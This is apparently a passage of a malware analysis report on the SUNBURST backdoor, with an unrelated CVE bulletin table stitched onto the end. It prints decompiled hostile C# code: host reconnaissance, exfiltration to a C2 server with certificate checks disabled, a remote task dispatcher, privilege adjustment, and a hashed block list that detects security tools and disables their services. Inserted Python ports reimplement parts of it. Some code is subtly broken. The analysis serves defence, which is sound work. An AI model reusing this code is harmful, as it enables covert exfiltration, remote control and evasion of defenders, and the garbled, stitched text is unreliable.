    string str1 = OrionImprovementBusinessLayer.ZipHelper.Unzip("K8gwSs1MyzfOMy0tSTfMskixNCksKkvKzTYoTswxN0sGAA==");
    string str2 = "";
    uint num1 = 0;
    int num2 = 0;
    foreach (byte num3 in bytes)
    {
        num1 |= (uint) num3 << num2;
        for (num2 += 8; num2 >= 5; num2 -= 5)
        {
            str2 += str1[(int) num1 & 31].ToString();
            num1 >>= 5;
        }
    }
    if (num2 > 0)
    {
        if (rt)
            num1 |= (uint) (new Random().Next() << num2);
        str2 += str1[(int) num1 & 31].ToString();
    }
    return str2;
}
–End Base64Encode Function–
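The following is an added example, not code from the report or the sample: a Python port of the CreateSecureString and Base64Encode pair shown above, together with the inverse routines, so that a string encoded this way can be turned back into the key, the flag and the plaintext. The alphabet literal is the one the report quotes. ZipHelper.Unzip is not shown in the report; the unzip() here assumes it is Base64 followed by raw DEFLATE (what .NET's DeflateStream produces), and the code checks that assumption by decompressing the embedded blob and comparing it to the quoted alphabet. The test inputs are constructed.

```python
"""Port of SUNBURST's CryptoHelper encoding plus a decoder (added example)."""
from __future__ import annotations

import base64
import random
import zlib

ALPHABET = "ph2eifo3n5utg1j8d94qrvbmk0sal76c"          # 32 symbols, 5 bits each
ALPHABET_BLOB = "K8gwSs1MyzfOMy0tSTfMskixNCksKkvKzTYoTswxN0sGAA=="


def unzip(blob: str) -> str:
    """Assumed ZipHelper.Unzip: base64 -> raw DEFLATE (wbits=-15, no zlib header) -> UTF-8."""
    return zlib.decompress(base64.b64decode(blob), -15).decode("utf-8")


def custom_b32_encode(data: bytes, rt: bool, rng: random.Random) -> str:
    """Port of Base64Encode: 5 bits per output symbol, least-significant bits first."""
    out, acc, nbits = [], 0, 0
    for b in data:
        acc |= b << nbits
        nbits += 8
        while nbits >= 5:
            out.append(ALPHABET[acc & 31])
            acc >>= 5
            nbits -= 5
    if nbits > 0:
        if rt:  # fill the unused high bits of the last symbol with random bits
            acc |= rng.getrandbits(31) << nbits
        out.append(ALPHABET[acc & 31])
    return "".join(out)


def custom_b32_decode(text: str) -> bytes:
    """Inverse of custom_b32_encode; fewer than 8 leftover padding bits are discarded."""
    out, acc, nbits = bytearray(), 0, 0
    for ch in text:
        acc |= ALPHABET.index(ch) << nbits   # ValueError on a character outside the alphabet
        nbits += 5
        if nbits >= 8:
            out.append(acc & 0xFF)
            acc >>= 8
            nbits -= 8
    return bytes(out)


def create_secure_string(data: bytes, flag: bool, rng: random.Random) -> str:
    """Port of CreateSecureString: key byte in 1..126 (bit 7 set when flag), then XOR."""
    key = rng.randrange(1, 127)
    if flag:
        key |= 0x80
    return custom_b32_encode(bytes([key]) + bytes(b ^ key for b in data), True, rng)


def open_secure_string(text: str) -> tuple[bytes, bool]:
    """Recover (plaintext, flag) from an encoded string; the key is byte 0 of the decoded data."""
    raw = custom_b32_decode(text)
    key = raw[0]
    return bytes(b ^ key for b in raw[1:]), bool(key & 0x80)


if __name__ == "__main__":
    assert unzip(ALPHABET_BLOB) == ALPHABET, "blob does not decompress to the expected alphabet"
    enc = create_secure_string(b"OrionImprovementBusinessLayer", True, random.Random(7))
    print(enc, "->", open_secure_string(enc))
```

Because the key is carried in the first byte, decoding needs no secret: the decoder above is all that is required to read strings produced by this routine. The random padding in the final symbol means two encodings of the same input can differ in their last character, so signatures on the encoded form should not depend on that character.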
**COLLECT SYSTEM INFORMATION**
The collection of system description information is carried out by the CollectSystemDescription function. Each field is prefixed with an identifier obtained from Job.GetDescriptionId, and the function gathers the following:
– Domain name
– Domain SID, obtained by translating the domain's Administrator account to a SecurityIdentifier (left empty if the lookup fails)
– Hostname
– Username
– Operating System (OS) version
– System directory
– Environment tick count, converted to days since the system was last rebooted
– Network adapter configuration, appended by GetNetworkAdapterConfiguration
public static void CollectSystemDescription(string info, out string result)
{
    // Unzip() arguments are shown decoded in this listing; the binary passes compressed, Base64-encoded strings.
    result = (string) null;
    int i = 0;
    string domainName = IPGlobalProperties.GetIPGlobalProperties().DomainName;
    result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) + domainName;
    try
    {
        string str = ((SecurityIdentifier) new NTAccount(domainName, OrionImprovementBusinessLayer.ZipHelper.Unzip(Administrator)).Translate(typeof (SecurityIdentifier))).AccountDomainSid.ToString();
        result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) + str;
    }
    catch
    {
        result += OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i);
    }
    result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) + IPGlobalProperties.GetIPGlobalProperties().HostName;
    result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) + Environment.UserName;
    result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) + OrionImprovementBusinessLayer.GetOSVersion(true);
    result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) + Environment.SystemDirectory;
    result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) + (object) (int) TimeSpan.FromMilliseconds((double) (uint) Environment.TickCount).TotalDays;
    result = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) + info + "\n";
    result += OrionImprovementBusinessLayer.GetNetworkAdapterConfiguration();
}
The GetNetworkAdapterConfiguration function will gather information on any attached network adapters and their configuration information.
private static string GetNetworkAdapterConfiguration()
{
    // Unzip() arguments are shown decoded in this listing; the binary passes compressed, Base64-encoded strings.
    string str = "";
    try
    {
        using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(OrionImprovementBusinessLayer.ZipHelper.Unzip(Select * From Win32_NetworkAdapterConfiguration where IPEnabled=true)))
        {
            foreach (ManagementObject managementObject in managementObjectSearcher.Get().Cast<ManagementObject>())
            {
                str += "\n";
                str += OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject, OrionImprovementBusinessLayer.ZipHelper.Unzip(Description));
                str += OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject, OrionImprovementBusinessLayer.ZipHelper.Unzip(MACAddress));
                str += OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject, OrionImprovementBusinessLayer.ZipHelper.Unzip(DHCPEnabled));
                str += OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject, OrionImprovementBusinessLayer.ZipHelper.Unzip(DHCPServer));
                str += OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject, OrionImprovementBusinessLayer.ZipHelper.Unzip(DNSHostName));
                str += OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject, OrionImprovementBusinessLayer.ZipHelper.Unzip(DNSDomainSuffixSearchOrder));
                str += OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject, OrionImprovementBusinessLayer.ZipHelper.Unzip(DNSServerSearchOrder));
                str += OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject, OrionImprovementBusinessLayer.ZipHelper.Unzip(IPAddress));
                str += OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject, OrionImprovementBusinessLayer.ZipHelper.Unzip(IPSubnet));
                str += OrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject, OrionImprovementBusinessLayer.ZipHelper.Unzip(DefaultIPGateway));
            }
            return str;
        }
    }
    catch (Exception ex)
    {
        return str + ex.Message;
    }
}
**UPLOAD SYSTEM INFORMATION**
The "UploadSystemDescription" function is used to exfiltrate gathered system information. It takes a URL and a Base64-encoded block of raw HTTP request text, splits that block into lines, and rebuilds a full HTTP request from it that is sent to the remote C2 server. Header names are not compared as strings: each restricted header name is hashed with the modified FNV-1a algorithm and dispatched on the hash value, for example "accept" (2734787258623754862) and "content-type" (6116246686670134098), and the same trick is applied to header values such as "100-continue", "keep-alive" and "close". This makes it harder, by manual review or by string heuristics, to identify that the function's intent is to generate an outbound HTTP session. Note also that the function installs a ServerCertificateValidationCallback that always returns true, so any TLS certificate presented by the endpoint is accepted.
–Begin UploadSystemDescription Function–
public static void UploadSystemDescription(string[] args, out string result, IWebProxy proxy)
{
result = (string) null;
string requestUriString = args[0];
string s1 = args[1];
string s2 = args.Length >= 3 ? args[2] : (string) null;
string[] strArray = Encoding.UTF8.GetString(Convert.FromBase64String(s1)).Split(new string[3] { "\r\n", "\r", "\n" }, StringSplitOptions.None);
HttpWebRequest httpWebRequest1 = (HttpWebRequest) WebRequest.Create(requestUriString);
HttpWebRequest httpWebRequest2 = httpWebRequest1;
httpWebRequest2.set_ServerCertificateValidationCallback(httpWebRequest2.get_ServerCertificateValidationCallback() + (RemoteCertificateValidationCallback) ((sender, cert, chain, sslPolicyErrors) => true));
httpWebRequest1.Proxy = proxy;
httpWebRequest1.Timeout = 120000;
httpWebRequest1.Method = strArray[0].Split(' ')[0];
foreach (string header in strArray)
{
int length = header.IndexOf(‘:’);
if (length > 0)
{
string headerName = header.Substring(0, length);
string s3 = header.Substring(length + 1).TrimStart((char[]) Array.Empty<char>());
if (!WebHeaderCollection.IsRestricted(headerName))
{
httpWebRequest1.Headers.Add(header);
}
else
{
switch (OrionImprovementBusinessLayer.GetHash(headerName.ToLower()))
{
case 2734787258623754862:
httpWebRequest1.Accept = s3;
continue;
case 6116246686670134098:
httpWebRequest1.ContentType = s3;
continue;
case 7574774749059321801:
httpWebRequest1.UserAgent = s3;
continue;
case 8873858923435176895:
if (OrionImprovementBusinessLayer.GetHash(s3.ToLower()) == 1475579823244607677UL)
{
httpWebRequest1.ServicePoint.Expect100Continue = true;
continue;
}
httpWebRequest1.Expect = s3;
continue;
case 9007106680104765185:
httpWebRequest1.Referer = s3;
continue;
case 11266044540366291518:
ulong hash = OrionImprovementBusinessLayer.GetHash(s3.ToLower());
httpWebRequest1.KeepAlive = hash == 13852439084267373191UL || httpWebRequest1.KeepAlive;
httpWebRequest1.KeepAlive = hash != 14226582801651130532UL && httpWebRequest1.KeepAlive;
continue;
case 15514036435533858158:
httpWebRequest1.set_Date(DateTime.Parse(s3));
continue;
case 16066522799090129502:
httpWebRequest1.set_Date(DateTime.Parse(s3));
continue;
default:
continue;
}
–End UploadSystemDescription Function–
SUNBURST contains functions that give it the ability to run specified tasks, terminate processes, delete files, compute file hashes, and reboot the victim system.
**RUN SPECIFIED TASKS**
The "ExecuteEngine" method is the core dispatcher: it maps the "job" value received from the C2 to a handler and returns a status code and result string. Jobs visible in the code include setting the C2 polling delay (SetTime), running a command line (RunTask), reading, setting and deleting registry values (for persistence and configuration changes), collecting and uploading the system description, listing processes by description, killing a task, and file operations (WriteFile, FileExists, DeleteFile, GetFileHash, GetFileSystemEntries), which is how a secondary payload can be written to disk and then executed:
–Begin ExecuteEngine Function–
private int ExecuteEngine(
OrionImprovementBusinessLayer.HttpHelper.JobEngine job,
string cl,
out string result)
{
result = (string) null;
int num = 0;
string[] args = OrionImprovementBusinessLayer.Job.SplitString(cl);
try
{
if (job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.ReadRegistryValue || job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.SetRegistryValue || (job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.DeleteRegistryValue || job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.GetRegistrySubKeyAndValueNames))
num = OrionImprovementBusinessLayer.HttpHelper.AddRegistryExecutionEngine(job, args, out result);
switch (job)
{
case OrionImprovementBusinessLayer.HttpHelper.JobEngine.SetTime:
int delay;
OrionImprovementBusinessLayer.Job.SetTime(args, out delay);
this.delay = delay;
break;
case OrionImprovementBusinessLayer.HttpHelper.JobEngine.CollectSystemDescription:
OrionImprovementBusinessLayer.Job.CollectSystemDescription(this.proxy.ToString(), out result);
break;
case OrionImprovementBusinessLayer.HttpHelper.JobEngine.UploadSystemDescription:
OrionImprovementBusinessLayer.Job.UploadSystemDescription(args, out result, this.proxy.GetWebProxy());
break;
case OrionImprovementBusinessLayer.HttpHelper.JobEngine.RunTask:
num = OrionImprovementBusinessLayer.Job.RunTask(args, cl, out result);
break;
case OrionImprovementBusinessLayer.HttpHelper.JobEngine.GetProcessByDescription:
OrionImprovementBusinessLayer.Job.GetProcessByDescription(args, out result);
break;
case OrionImprovementBusinessLayer.HttpHelper.JobEngine.KillTask:
OrionImprovementBusinessLayer.Job.KillTask(args);
break;
}
return job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.WriteFile || job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.FileExists || (job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.DeleteFile || job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.GetFileHash) || job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.GetFileSystemEntries ? OrionImprovementBusinessLayer.HttpHelper.AddFileExecutionEngine(job, args, out result) : num;
}
catch (Exception ex)
{
if (!string.IsNullOrEmpty(result))
result += "\n";
result += ex.Message;
return ex.HResult;
}
–End ExecuteEngine Function–
**TERMINATE PROCESSES**
public static void KillTask(string[] args) =>
Process.GetProcessById(int.Parse(args[0])).Kill();
**DELETE FILE**
public static void DeleteFile(string[] args) => System.IO.File.Delete(Environment.ExpandEnvironmentVariables(args[0]));
**COMPUTE FILE HASHES**
public static int GetFileHash(string[] args, out string result)
{
result = (string) null;
string path = Environment.ExpandEnvironmentVariables(args[0]);
using (MD5 md5 = MD5.Create())
{
using (FileStream fileStream = System.IO.File.OpenRead(path))
{
byte[] hash = md5.ComputeHash((Stream) fileStream);
if (args.Length > 1)
return !(OrionImprovementBusinessLayer.ByteArrayToHexString(hash).ToLower() == args[1].ToLower()) ? 1 : 0;
result = OrionImprovementBusinessLayer.ByteArrayToHexString(hash);
}
}
return 0;
}
**REBOOT SYSTEM**
public static bool RebootComputer()
{
bool flag = false;
try
{
bool previousState = false;
string privilege = OrionImprovementBusinessLayer.ZipHelper.Unzip(ph2eifo3n5utg1j8d94qrvbmk0sal76c);
if (!OrionImprovementBusinessLayer.NativeMethods.SetProcessPrivilege(privilege, true, out previousState))
return flag;
flag = OrionImprovementBusinessLayer.NativeMethods.InitiateSystemShutdownEx((string) null, (string) null, 0U, true, true, 2147745794U);
OrionImprovementBusinessLayer.NativeMethods.SetProcessPrivilege(privilege, previousState, out previousState);
return flag;
}
catch (Exception ex)
{
return flag;
}
}
–End Additional Functions–
**ADJUST PROCESS PRIVILEGES**
The SetProcessPrivilege function is used to adjust privileges for a target process on the victim system. For example, a process may need increased system level privileges to accomplish its designed task.
–Begin SetProcessPrivilege Function–
public static bool SetProcessPrivilege(
string privilege,
bool newState,
out bool previousState)
{
bool flag = false;
previousState = false;
try
{
IntPtr zero = IntPtr.Zero;
OrionImprovementBusinessLayer.NativeMethods.LUID Luid = new OrionImprovementBusinessLayer.NativeMethods.LUID();
Luid.LowPart = 0U;
Luid.HighPart = 0U;
if (!OrionImprovementBusinessLayer.NativeMethods.OpenProcessToken(OrionImprovementBusinessLayer.NativeMethods.GetCurrentProcess(), TokenAccessLevels.Query | TokenAccessLevels.AdjustPrivileges, ref zero))
return false;
if (!OrionImprovementBusinessLayer.NativeMethods.LookupPrivilegeValue((string) null, privilege, ref Luid))
{
OrionImprovementBusinessLayer.NativeMethods.CloseHandle(zero);
return false;
}
OrionImprovementBusinessLayer.NativeMethods.TOKEN_PRIVILEGE NewState = new OrionImprovementBusinessLayer.NativeMethods.TOKEN_PRIVILEGE();
OrionImprovementBusinessLayer.NativeMethods.TOKEN_PRIVILEGE PreviousState = new OrionImprovementBusinessLayer.NativeMethods.TOKEN_PRIVILEGE();
NewState.PrivilegeCount = 1U;
NewState.Privilege.Luid = Luid;
NewState.Privilege.Attributes = newState ? 2U : 0U;
uint ReturnLength = 0;
OrionImprovementBusinessLayer.NativeMethods.AdjustTokenPrivileges(zero, false, ref NewState, (uint) Marshal.SizeOf((object) PreviousState), ref PreviousState, ref ReturnLength);
previousState = (PreviousState.Privilege.Attributes & 2U) > 0U;
flag = true;
OrionImprovementBusinessLayer.NativeMethods.CloseHandle(zero);
return flag;
}
catch (Exception ex)
{
return flag;
}
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
private struct LUID
{
public uint LowPart;
public uint HighPart;
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
private struct LUID_AND_ATTRIBUTES
{
public OrionImprovementBusinessLayer.NativeMethods.LUID Luid;
public uint Attributes;
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
private struct TOKEN_PRIVILEGE
{
public uint PrivilegeCount;
public OrionImprovementBusinessLayer.NativeMethods.LUID_AND_ATTRIBUTES Privilege;
}
}
–End SetProcessPrivilege Function–
**BLOCK LIST CHECKING FUNCTIONS**
The Update function is critical to starting the SUNBURST C2 functionality. Early in its execution, the Update function calls the UpdateNotification() function. If that returns a “False”, indicating one of the hard-coded block list processes is running, the SUNBURST malware will not initiate its C2 session. The malicious class “OrionImprovementBusinessLayer”, containing the SUNBURST module, will effectively be disabled. However, the parent SolarWinds process running the malicious DLL 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77 will not be interrupted.
–Begin Update Function–
private static void Update()
{
bool flag1 = false;
OrionImprovementBusinessLayer.CryptoHelper cryptoHelper = new OrionImprovementBusinessLayer.CryptoHelper(OrionImprovementBusinessLayer.userId, OrionImprovementBusinessLayer.domain4);
OrionImprovementBusinessLayer.HttpHelper http = (OrionImprovementBusinessLayer.HttpHelper) null;
Thread thread = (Thread) null;
bool last = true;
OrionImprovementBusinessLayer.AddressFamilyEx addressFamilyEx = OrionImprovementBusinessLayer.AddressFamilyEx.Unknown;
int num1 = 0;
bool flag2 = true;
OrionImprovementBusinessLayer.DnsRecords rec = new OrionImprovementBusinessLayer.DnsRecords();
Random random = new Random();
int num2 = 0;
if (!OrionImprovementBusinessLayer.UpdateNotification())
return;
OrionImprovementBusinessLayer.svcListModified2 = false;
for (int index = 1; index <= 3 && !flag1; ++index)
{
OrionImprovementBusinessLayer.DelayMin(rec.A, rec.A);
if (!OrionImprovementBusinessLayer.ProcessTracker.TrackProcesses(true))
{
if (OrionImprovementBusinessLayer.svcListModified1)
flag2 = true;
num1 = OrionImprovementBusinessLayer.svcListModified2 ? num1 + 1 : 0;
string hostName;
switch (OrionImprovementBusinessLayer.status)
{
case OrionImprovementBusinessLayer.ReportStatus.New:
hostName = addressFamilyEx == OrionImprovementBusinessLayer.AddressFamilyEx.Error ? cryptoHelper.GetCurrentString() : cryptoHelper.GetPreviousString(out last);
break;
case OrionImprovementBusinessLayer.ReportStatus.Append:
hostName = flag2 ? cryptoHelper.GetNextStringEx(rec.dnssec) : cryptoHelper.GetNextString(rec.dnssec);
break;
default:
goto label_27;
}
–End Update Function–
The UpdateNotification() function returns “False” if any process on the hard-coded blocklist is running on the target system. It relies on the TrackProcesses function, detailed below.
–Begin UpdateNotification Function–
private static bool UpdateNotification()
{
int num = 3;
while (num-- > 0)
{
OrionImprovementBusinessLayer.DelayMin(0, 0);
if (OrionImprovementBusinessLayer.ProcessTracker.TrackProcesses(true))
return false;
if (OrionImprovementBusinessLayer.DnsHelper.CheckServerConnection(OrionImprovementBusinessLayer.apiHost))
return true;
}
return false;
}
–End UpdateNotification Function–
The “TrackProcesses” function queries the list of running processes on the target system and passes the process names to the “SearchAssemblies” function, which hashes each process name and compares the resulting hashes against the hard-coded process hash list stored in “assemblyTimeStamps.” If any of the targeted processes is running, the function returns True. It also searches for certain services and attempts to disable them.
–Begin TrackProcesses Function–
public static bool TrackProcesses(bool full)
{
Process[] processes = Process.GetProcesses();
if (OrionImprovementBusinessLayer.ProcessTracker.SearchAssemblies(processes))
return true;
bool flag = OrionImprovementBusinessLayer.ProcessTracker.SearchServices(processes);
return !flag & full ? OrionImprovementBusinessLayer.ProcessTracker.SearchConfigurations() : flag;
}
–End TrackProcesses Function–
The “SearchAssemblies” function, called by TrackProcesses, enumerates the running processes to determine whether any process whose hash appears in the hard-coded process blocklist is currently running on the target system.
–Begin SearchAssemblies Function–
private static bool SearchAssemblies(Process[] processes)
{
for (int index = 0; index < processes.Length; ++index)
{
ulong hash = OrionImprovementBusinessLayer.GetHash(processes[index].ProcessName.ToLower());
if (Array.IndexOf<ulong>(OrionImprovementBusinessLayer.assemblyTimeStamps, hash) != -1)
return true;
}
return false;
}
–End SearchAssemblies Function–
The “SearchServices” function, called by TrackProcesses, checks the running processes against the hard-coded hash lists of the block-listed services (svcList) to determine whether any of those services is running. It attempts to disable any such service it finds.
–Begin SearchServices Function–
private static bool SearchServices(Process[] processes)
{
for (int index = 0; index < processes.Length; ++index)
{
ulong hash = OrionImprovementBusinessLayer.GetHash(processes[index].ProcessName.ToLower());
foreach (OrionImprovementBusinessLayer.ServiceConfiguration svc in OrionImprovementBusinessLayer.svcList)
{
if (Array.IndexOf<ulong>(svc.timeStamps, hash) != -1)
{
object obj = OrionImprovementBusinessLayer.ProcessTracker._lock;
bool flag = false;
try
{
Monitor.Enter(obj, ref flag);
if (!svc.running)
{
OrionImprovementBusinessLayer.svcListModified1 = true;
OrionImprovementBusinessLayer.svcListModified2 = true;
svc.running = true;
}
if (!svc.disabled)
{
if (!svc.stopped)
{
if (svc.Svc.Length != 0)
{
OrionImprovementBusinessLayer.DelayMin(0, 0);
OrionImprovementBusinessLayer.ProcessTracker.SetManualMode(svc.Svc);
svc.disabled = true;
svc.stopped = true;
}
}
}
}
finally
{
if (flag)
Monitor.Exit(obj);
}
–End SearchServices Function–
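The block-list logic described for TrackProcesses, SearchAssemblies and SearchServices above, reproduced as an added analyst example (this is not code from the report or from SolarWinds). It assumes, from public analyses of the sample rather than from this section of the report, that GetHash is 64-bit FNV-1a followed by an XOR with a fixed constant; the tool names and service entry below are constructed, not SUNBURST's real list.

```python
"""Offline reimplementation of SUNBURST's hashed process block-list check.

Assumption (not shown in this section of the report): GetHash is 64-bit FNV-1a
with a final XOR constant, as described in public analyses of the sample.
"""
from typing import Dict, Iterable, List, Optional

FNV64_OFFSET = 14695981039346656037
FNV64_PRIME = 1099511628211
SUNBURST_XOR = 6605813339339102567   # assumed final XOR constant (public analysis)
MASK64 = (1 << 64) - 1


def get_hash(name: str) -> int:
    """Stand-in for OrionImprovementBusinessLayer.GetHash (assumed FNV-1a64 ^ const).

    The malware always calls GetHash(name.ToLower()); callers here lower-case too.
    """
    h = FNV64_OFFSET
    for b in name.encode("utf-8"):
        h ^= b
        h = (h * FNV64_PRIME) & MASK64
    return h ^ SUNBURST_XOR


def search_assemblies(process_names: Iterable[str], block_list: Iterable[int]) -> bool:
    """Mirrors SearchAssemblies: True if any process name hashes into the block list."""
    block = set(block_list)
    return any(get_hash(p.lower()) in block for p in process_names)


def resolve_hashes(block_list: Iterable[int],
                   candidates: Iterable[str]) -> Dict[int, Optional[str]]:
    """Analyst helper: map each block-list hash back to a tool name by hashing a
    dictionary of candidate names (how an obfuscated hash list is recovered)."""
    table = {get_hash(c.lower()): c.lower() for c in candidates}
    return {h: table.get(h) for h in block_list}


class ServiceConfiguration:
    """Minimal stand-in for OrionImprovementBusinessLayer.ServiceConfiguration."""

    def __init__(self, svc: str, time_stamps: List[int]) -> None:
        self.svc = svc                  # service name that SetManualMode would act on
        self.time_stamps = time_stamps  # hashes of the service's process names
        self.running = False
        self.disabled = False
        self.stopped = False


def search_services(process_names: Iterable[str],
                    svc_list: List[ServiceConfiguration]) -> List[str]:
    """Mirrors the SearchServices state machine without touching the registry:
    returns the service names the malware would switch to manual start."""
    to_manual: List[str] = []
    for p in process_names:
        h = get_hash(p.lower())
        for svc in svc_list:
            if h in svc.time_stamps:
                svc.running = True
                # same guard order as the decompiled code: disabled, stopped, Svc.Length
                if not svc.disabled and not svc.stopped and svc.svc:
                    to_manual.append(svc.svc)
                    svc.disabled = True
                    svc.stopped = True
    return to_manual


# Constructed sample block list (made-up tool names, NOT SUNBURST's real hashes).
SAMPLE_BLOCKED_TOOLS = ["edrsensor", "sandboxagent"]
SAMPLE_BLOCK_LIST = [get_hash(n) for n in SAMPLE_BLOCKED_TOOLS]

if __name__ == "__main__":
    running = ["svchost", "explorer", "EdrSensor"]   # constructed process list
    print("block-listed process running:", search_assemblies(running, SAMPLE_BLOCK_LIST))
    print(resolve_hashes(SAMPLE_BLOCK_LIST, ["notepad", "edrsensor", "sandboxagent"]))
```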
Screenshots

Figure 1 – The modified module with a new class function named “OrionImprovementBusinessLayer.”

Figure 2 – The code snippet contains the subdomains and other strings used to construct the C2 domains.
| Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info |
|---|---|---|---|---|
| huawei — multiple_products | There is an information leak vulnerability in eCNS280_TD versions V100R005C00 and V100R005C10. A command does not have a timeout exit mechanism, and a temporary file contains sensitive information. This allows attackers to obtain information by inter-process access that requires other methods. | 2021-02-06 | not yet calculated | CVE-2021-22300 CONFIRM |
| allen-bradley — flex_io_1794-aent/b | An exploitable denial of service vulnerability exists in the ENIP Request Path Network Segment functionality of Allen-Bradley Flex IO 1794-AENT/B 4.003. A specially crafted network request can cause a loss of communications with the device resulting in denial-of-service. An attacker can send a malicious packet to trigger this vulnerability. | 2021-02-04 | not yet calculated | CVE-2020-6088 MISC |
| angular — angular | angular-expressions is “angular’s nicest part extracted as a standalone module for the browser and node”. In angular-expressions before version 1.1.2 there is a vulnerability which allows Remote Code Execution if you call “expressions.compile(userControlledInput)” where “userControlledInput” is text that comes from user input. The security of the package could be bypassed by using a more complex payload, using a “.constructor.constructor” technique. In terms of impact: If running angular-expressions in the browser, an attacker could run any browser script when the application code calls expressions.compile(userControlledInput). If running angular-expressions on the server, an attacker could run any Javascript expression, thus gaining Remote Code Execution. This is fixed in version 1.1.2 of angular-expressions. A temporary workaround might be either to disable user-controlled input that will be fed into angular-expressions in your application or allow only following characters in the userControlledInput. | 2021-02-01 | not yet calculated | CVE-2021-21277 MISC MISC CONFIRM MISC |
| asuswrt — asus_rt-ax3000_firmware | Denial of service in ASUSWRT ASUS RT-AX3000 firmware versions 3.0.0.4.384_10177 and earlier versions allows an attacker to disrupt the use of device setup services via continuous login error. | 2021-02-05 | not yet calculated | CVE-2021-3229 MISC MISC MISC |
| bitcoin — core | Bitcoin Core before 0.19.0 might allow remote attackers to execute arbitrary code when another application unsafely passes the -platformpluginpath argument to the bitcoin-qt program, as demonstrated by an x-scheme-handler/bitcoin handler for a .desktop file or a web browser. NOTE: the discoverer states “I believe that this vulnerability cannot actually be exploited.” | 2021-02-04 | not yet calculated | CVE-2021-3401 MISC MISC |
| blaze — blaze | Http4s (http4s-blaze-server) is a minimal, idiomatic Scala interface for HTTP services. Http4s before versions 0.21.17, 0.22.0-M2, and 1.0.0-M14 have a vulnerability which can lead to a denial-of-service. Blaze-core, a library underlying http4s-blaze-server, accepts connections unboundedly on its selector pool. This has the net effect of amplifying degradation in services that are unable to handle their current request load, since incoming connections are still accepted and added to an unbounded queue. Each connection allocates a socket handle, which drains a scarce OS resource. This can also confound higher level circuit breakers which work based on detecting failed connections. http4s provides a general “MaxActiveRequests” middleware mechanism for limiting open connections, but it is enforced inside the Blaze accept loop, after the connection is accepted and the socket opened. Thus, the limit only prevents the number of connections which can be simultaneously processed, not the number of connections which can be held open. In 0.21.17, 0.22.0-M2, and 1.0.0-M14, a new “maxConnections” property, with a default value of 1024, has been added to the `BlazeServerBuilder`. Setting the value to a negative number restores unbounded behavior, but is strongly disrecommended. The NIO2 backend does not respect `maxConnections`. Its use is now deprecated in http4s-0.21, and the option is removed altogether starting in http4s-0.22. There are several possible workarounds described in the referenced GitHub Advisory GHSA-xhv5-w9c5-2r2w. | 2021-02-02 | not yet calculated | CVE-2021-21294 MISC MISC CONFIRM |
| blaze — blaze | blaze is a Scala library for building asynchronous pipelines, with a focus on network IO. All servers running blaze-core before version 0.14.15 are affected by a vulnerability in which unbounded connection acceptance leads to file handle exhaustion. Blaze accepts connections unconditionally on a dedicated thread pool. This has the net effect of amplifying degradation in services that are unable to handle their current request load, since incoming connections are still accepted and added to an unbounded queue. Each connection allocates a socket handle, which drains a scarce OS resource. This can also confound higher level circuit breakers which work based on detecting failed connections. The vast majority of affected users are using it as part of http4s-blaze-server <= 0.21.16. http4s provides a mechanism for limiting open connections, but it is enforced inside the Blaze accept loop, after the connection is accepted and the socket opened. Thus, the limit only prevents the number of connections which can be simultaneously processed, not the number of connections which can be held open. The issue is fixed in version 0.14.15 for “NIO1SocketServerGroup”. A “maxConnections” parameter is added, with a default value of 512. Concurrent connections beyond this limit are rejected. To run unbounded, which is not recommended, set a negative number. The “NIO2SocketServerGroup” has no such setting and is now deprecated. There are several possible workarounds described in the referenced GitHub Advisory GHSA-xmw9-q7x9-j5qc. | 2021-02-02 | not yet calculated | CVE-2021-21293 MISC CONFIRM MISC |
| cisco — 8000_series_routers | A vulnerability in a CLI command of Cisco IOS XR Software for the Cisco 8000 Series Routers and Network Convergence System 540 Series Routers running NCS540L software images could allow an authenticated, local attacker to elevate their privilege to root. To exploit this vulnerability, an attacker would need to have a valid account on an affected device. The vulnerability is due to insufficient validation of command line arguments. An attacker could exploit this vulnerability by authenticating to the device and entering a crafted command at the prompt. A successful exploit could allow an attacker with low-level privileges to escalate their privilege level to root. | 2021-02-04 | not yet calculated | CVE-2021-1370 CISCO |
| cisco — ios_xr_software | A vulnerability in the Local Packet Transport Services (LPTS) programming of the SNMP with the management plane protection feature of Cisco IOS XR Software could allow an unauthenticated, remote attacker to allow connections despite the management plane protection that is configured to deny access to the SNMP server of an affected device. This vulnerability is due to incorrect LPTS programming when using SNMP with management plane protection. An attacker could exploit this vulnerability by connecting to an affected device using SNMP. A successful exploit could allow the attacker to connect to the device on the configured SNMP ports. Valid credentials are required to execute any of the SNMP requests. | 2021-02-04 | not yet calculated | CVE-2021-1243 CISCO |
